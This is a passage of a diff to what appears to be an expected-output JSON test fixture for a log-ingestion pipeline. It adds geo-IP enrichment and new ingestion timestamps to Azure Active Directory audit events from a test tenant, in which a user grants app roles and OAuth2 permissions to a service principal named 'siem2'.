alue\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8821342Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622751\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"411fc666-cabf-4cb0-b8a3-e5a2cc515b79\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -16700,6 +17756,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -16866,7 +17934,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125348500Z", + "ingested": "2021-12-14T14:48:43.176739830Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.8071361Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622707\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"256e3859-87ca-4b23-b2c0-45a26ccd7925\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -16893,6 +17961,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -17059,7 +18139,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125354800Z", + "ingested": "2021-12-14T14:48:43.176740836Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:41\",\"ExtendedProperties\":[{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\"},{\"Name\":\"targetName\",\"Value\":\"Office 365 Management APIs\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":\\\"siem2\\\",\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\",\\\"Name\\\":\\\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\\\"}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:41.9571526Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622781\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"a4a12952-3467-4d48-9950-48b4b9ac87b3\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"siem2\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"7d74cd19-0dc4-4e59-a2d7-ba6fdb44ac40\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"OldValue\":\"\"}],\"ObjectId\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Operation\":\"Add app role assignment to service principal.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"efe101d0-818a-4f19-b2f8-53186f8218ad\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Office 365 Management APIs\",\"Type\":1},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2\",\"Type\":2},{\"ID\":\"c5393580-f805-4401-95e8-94b7a6ef2fc2;https://manage.office.com;https://manage.office365.us;https://manage.protection.apps.mil;https://manage-gcc.office.com\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -17086,6 +18166,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -17252,7 +18344,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125361200Z", + "ingested": "2021-12-14T14:48:43.176741458Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":\"Microsoft Graph\"},{\"Name\":\"targetIncludedUpdatedProperties\",\"Value\":\"[\\\"ServicePrincipal.ObjectID\\\",\\\"ServicePrincipal.DisplayName\\\",\\\"ServicePrincipal.AppId\\\",\\\"ServicePrincipal.Name\\\",\\\"TargetId.ServicePrincipalNames\\\"]\"},{\"Name\":\"correlationId\",\"Value\":\"1e80f57e-764e-4c42-bead-7ccf998fe780\"},{\"Name\":\"version\",\"Value\":\"2\"},{\"Name\":\"additionalTargets\",\"Value\":\"[{\\\"ObjectID\\\":\\\"fb91e9f0-9485-4a68-89e9-a164d20ae855\\\",\\\"DisplayName\\\":null,\\\"ObjectClass\\\":\\\"ServicePrincipal\\\",\\\"AppId\\\":null,\\\"Name\\\":null}]\"},{\"Name\":\"additionalDetails\",\"Value\":\"{\\\"User-Agent\\\":\\\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:72.0) Gecko/20100101 Firefox/72.0\\\"}\"},{\"Name\":\"resultType\",\"Value\":\"Success\"},{\"Name\":\"auditEventCategory\",\"Value\":\"ApplicationManagement\"},{\"Name\":\"nCloud\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_ver\",\"Value\":\"2.1\"},{\"Name\":\"env_name\",\"Value\":\"#Ifx.AuditSchema#IfxMsods.AuditCommonEvent\"},{\"Name\":\"env_time\",\"Value\":\"2020-02-11T16:45:42.0571467Z\"},{\"Name\":\"env_epoch\",\"Value\":\"748B6\"},{\"Name\":\"env_seqNum\",\"Value\":\"34622817\"},{\"Name\":\"env_popSample\",\"Value\":\"0\"},{\"Name\":\"env_iKey\",\"Value\":\"ikey\"},{\"Name\":\"env_flags\",\"Value\":\"257\"},{\"Name\":\"env_cv\",\"Value\":\"##66bd1840-878d-4dd1-aa64-c618c53aff2e_00000000-0000-0000-0000-000000000000_66bd1840-878d-4dd1-aa64-c618c53aff2e\"},{\"Name\":\"env_os\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_osVer\",\"Value\":\"\\u003cnull\\u003e\"},{\"Name\":\"env_appId\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_appVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_ver\",\"Value\":\"1.0\"},{\"Name\":\"env_cloud_name\",\"Value\":\"MSO-AM5R\"},{\"Name\":\"env_cloud_role\",\"Value\":\"restdirectoryservice\"},{\"Name\":\"env_cloud_roleVer\",\"Value\":\"1.0.11737.0\"},{\"Name\":\"env_cloud_roleInstance\",\"Value\":\"AM5RRDSR571\"},{\"Name\":\"env_cloud_environment\",\"Value\":\"PROD\"},{\"Name\":\"env_cloud_deploymentUnit\",\"Value\":\"R5\"}],\"Id\":\"db3ce560-1c2f-4c85-b305-55ad6476250f\",\"ModifiedProperties\":[{\"Name\":\"ServicePrincipal.ObjectID\",\"NewValue\":\"fb91e9f0-9485-4a68-89e9-a164d20ae855\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.DisplayName\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.AppId\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"ServicePrincipal.Name\",\"NewValue\":\"\",\"OldValue\":\"\"},{\"Name\":\"TargetId.ServicePrincipalNames\",\"NewValue\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"OldValue\":\"\"}],\"ObjectId\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Operation\":\"Add OAuth2PermissionGrant.\",\"OrganizationId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"RecordType\":8,\"ResultStatus\":\"Success\",\"SupportTicketId\":\"\",\"Target\":[{\"ID\":\"ServicePrincipal_98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\",\"Type\":2},{\"ID\":\"ServicePrincipal\",\"Type\":2},{\"ID\":\"Microsoft Graph\",\"Type\":1},{\"ID\":\"00000003-0000-0000-c000-000000000000\",\"Type\":2},{\"ID\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\",\"Type\":4}],\"TargetContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"UserId\":\"asr@testsiem.onmicrosoft.com\",\"UserKey\":\"1003200096971F55@testsiem.onmicrosoft.com\",\"UserType\":0,\"Version\":1,\"Workload\":\"AzureActiveDirectory\"}", "code": "AzureActiveDirectory", "provider": "AzureActiveDirectory", @@ -17279,6 +18371,18 @@ }, { "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "ip": "67.43.156.15" }, "tags": [ @@ -17445,7 +18549,7 @@ "ip": "67.43.156.15" }, "event": { - "ingested": "2021-12-09T13:41:51.125367600Z", + "ingested": "2021-12-14T14:48:43.176742035Z", "original": "{\"Actor\":[{\"ID\":\"asr@testsiem.onmicrosoft.com\",\"Type\":5},{\"ID\":\"1003200096971F55\",\"Type\":3},{\"ID\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\",\"Type\":2},{\"ID\":\"User_755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"755e500a-6c03-46b0-b53b-282f23374e3b\",\"Type\":2},{\"ID\":\"User\",\"Type\":2}],\"ActorContextId\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\",\"ActorIpAddress\":\"67.43.156.15\",\"AzureActiveDirectoryEventType\":1,\"ClientIP\":\"67.43.156.15\",\"CreationTime\":\"2020-02-11T16:45:42\",\"ExtendedProperties\":[{\"Name\":\"actorContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"actorObjectId\",\"Value\":\"755e500a-6c03-46b0-b53b-282f23374e3b\"},{\"Name\":\"actorObjectClass\",\"Value\":\"User\"},{\"Name\":\"actorUPN\",\"Value\":\"asr@testsiem.onmicrosoft.com\"},{\"Name\":\"actorAppID\",\"Value\":\"18ed3507-a475-4ccb-b669-d66bc9f2a36e\"},{\"Name\":\"actorPUID\",\"Value\":\"1003200096971F55\"},{\"Name\":\"teamName\",\"Value\":\"MSODS.\"},{\"Name\":\"targetContextId\",\"Value\":\"b86ab9d4-fcf1-4b11-8a06-7a8f91b47fbd\"},{\"Name\":\"targetObjectId\",\"Value\":\"98528ef9-e89b-469a-b19b-fa8e72a00fa6\"},{\"Name\":\"extendedAuditEventCategory\",\"Value\":\"ServicePrincipal\"},{\"Name\":\"targetSPN\",\"Value\":\"00000003-0000-0000-c000-000000000000/ags.windows.net;00000003-0000-0000-c000-000000000000;https://canary.graph.microsoft.com;https://graph.microsoft.com;https://ags.windows.net;https://graph.microsoft.us;https://graph.microsoft.com/;https://dod-graph.microsoft.us\"},{\"Name\":\"targetName\",\"Value\":